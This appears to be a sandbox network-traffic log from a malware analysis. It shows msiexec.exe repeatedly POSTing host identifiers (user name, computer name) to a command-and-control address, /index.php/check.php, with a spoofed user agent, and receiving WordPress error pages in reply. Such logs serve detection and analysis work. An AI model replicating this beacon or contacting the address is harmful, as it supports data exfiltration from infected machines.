                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:40.069118023 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:43:40.069129944 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:43:40.180964947 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:40.185853004 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:42.828028917 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:40 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:42.828052044 CEST | 224 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:43:42.828062057 CEST | 1236 | IN
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:43:42.828068972 CEST | 142 | IN
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:43:42.997507095 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:43.003129959 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:45.589272976 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:43 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:45.589292049 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:43:45.589302063 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      4 | 192.168.2.5 | 49720 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:43:45.736512899 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:45.741447926 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:48.330589056 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:46 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:48.330615997 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:43:48.330630064 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      5 | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:43:48.567946911 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:48.572784901 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:51.195276022 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:49 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:51.195310116 CEST | 224 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                                      Oct 1, 2024 07:43:51.195353031 CEST | 1236 | IN | Data Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                                      Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                                      Oct 1, 2024 07:43:51.195436954 CEST | 142 | IN | Data Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                                      Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      6 | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:43:51.345716000 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:51.351557970 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:53.977747917 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:51 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:53.977772951 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:43:53.977787018 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      7 | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:43:54.127907038 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:54.132905960 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:43:57.727062941 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:54 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:57.727082014 CEST | 1236 | IN | Data Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:43:57.727099895 CEST | 366 | IN | Data Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress
                                      Oct 1, 2024 07:43:57.727124929 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:54 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:43:57.727202892 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:54 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      8 | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | 2584 | C:\Windows\SysWOW64\msiexec.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      Oct 1, 2024 07:43:57.874478102 CEST | 258 | OUT | POST /index.php/check.php?s=am9ntjjw HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: 137.184.191.215
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 1A0CD362
                                      Content-Length: 153
                                      Connection: close
                                      Oct 1, 2024 07:43:57.879403114 CEST | 153 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons701188ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 1, 2024 07:44:00.485987902 CEST | 1236 | IN | HTTP/1.0 500 Internal Server Error
                                      Date: Tue, 01 Oct 2024 05:43:58 GMT
                                      Server: Apache/2.4.52 (Ubuntu)
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Content-Length: 2557
                                      Connection: close
                                      Content-Type: text/html; charset=UTF-8
                                      Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                                      Oct 1, 2024 07:44:00.486028910 CEST | 1236 | IN
                                      Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                                      Oct 1, 2024 07:44:00.486047029 CEST | 366 | IN
                                      Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
